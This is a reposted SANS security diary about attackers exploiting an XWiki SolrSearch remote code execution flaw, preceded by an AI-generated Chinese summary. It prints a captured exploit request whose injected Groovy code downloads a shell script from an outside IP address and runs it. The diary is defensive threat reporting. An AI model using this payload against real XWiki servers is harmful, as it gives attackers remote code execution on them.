嗯,用户让我帮忙总结一篇文章,控制在一百个字以内,而且不需要特定的开头。首先,我需要仔细阅读文章内容,理解主要信息。 文章讲的是XWiki的一个远程代码执行漏洞,影响了SolrSearch组件。这个漏洞被NIST加入已知被利用的漏洞列表。攻击者利用这个漏洞加载恶意脚本,但最终加载的却是一个广告页面,涉及到芝加哥说唱歌手之间的恩怨。 接下来,我需要提取关键点:XWiki的漏洞、受影响的组件、NIST的加入、攻击方式以及背后的有趣背景。然后,把这些信息浓缩成简洁的一百字以内。 要注意用词准确,同时保持连贯。比如,“远程代码执行漏洞”、“SolrSearch组件”、“NIST已知被利用漏洞列表”、“恶意脚本”、“芝加哥说唱歌手恩怨”等关键词。 最后,检查字数是否符合要求,并确保没有遗漏重要信息。这样用户就能快速了解文章的核心内容了。 </think> XWiki披露了一个远程代码执行漏洞,影响其SolrSearch组件。尽管NIST已将其列为已知被利用的漏洞,但实际攻击尝试直到近期才开始。攻击者通过恶意脚本试图控制目标系统,但最终加载的内容却指向了一段与芝加哥说唱歌手恩怨相关的广告页面。 2025-11-3 14:20:5 Author: isc.sans.edu(查看原文) 阅读量:13 收藏
XWiki describes itself as "The Advanced Open-Source Enterprise Wiki" and considers itself an alternative to Confluence and MediaWiki. In February, XWiki released an advisory (and patch) for an arbitrary remote code execution vulnerability. Affected was the SolrSearch component, which any user, even with minimal "Guest" privileges, can use. The advisory included PoC code, so it is a bit odd that it took so long for the vulnerability to be widely exploited.
NIST added the vulnerability to its "Known Exploited Vulnerabilities" list this past Friday. Our data shows some reconnaissance scans starting in July, but actual exploit attempts did not commence until yesterday.
The exploit requests are relatively straightforward:
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text={{async async=false}}{{groovy}}['sh', '-c', 'wget -qO- http://74.194.191.52/rondo.sdu.sh|sh'].execute().text{{/groovy}}{{/async}} HTTP/1.1
Host: [honeypot IP address]
User-Agent: Mozilla/5.0 ([email protected])
Connection: close
Accept: */*
The exploit attempt is loading a shell script from 74.194.191.52. The script is no longer present on the site. However, the site displays what appears to be an advertisement for a fairly average rap song, and it also displays the same email address as the one included in the user agent. Maybe the actual attacker's email address? I will try to reach out to see what I get back.
The page returned, instead of the malware, is advertising the Chicago rapper "King Lil Jay". King Lil Jay is a rival of RondoNumbaNine, and both are currently incarcerated. The reference to "rondo" in the malware script name is likely referring to RondoNumbaNine. In the past, both rappers were affiliated with opposing gangs in Chicago, and in part, participated in and celebrated in their music the violence associated with the gang rivalry. While, according to some reports [3], the two rappers ended their rivalry, it is odd to see some of this come up in a random online attack.
[1] https://www.xwiki.org/xwiki/bin/view/Main/WebHome
[2] https://nvd.nist.gov/vuln/detail/CVE-2025-24893
[3] https://www.youtube.com/shorts/llh53PYnHWQ
--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|
如有侵权请联系:admin#unsafe.sh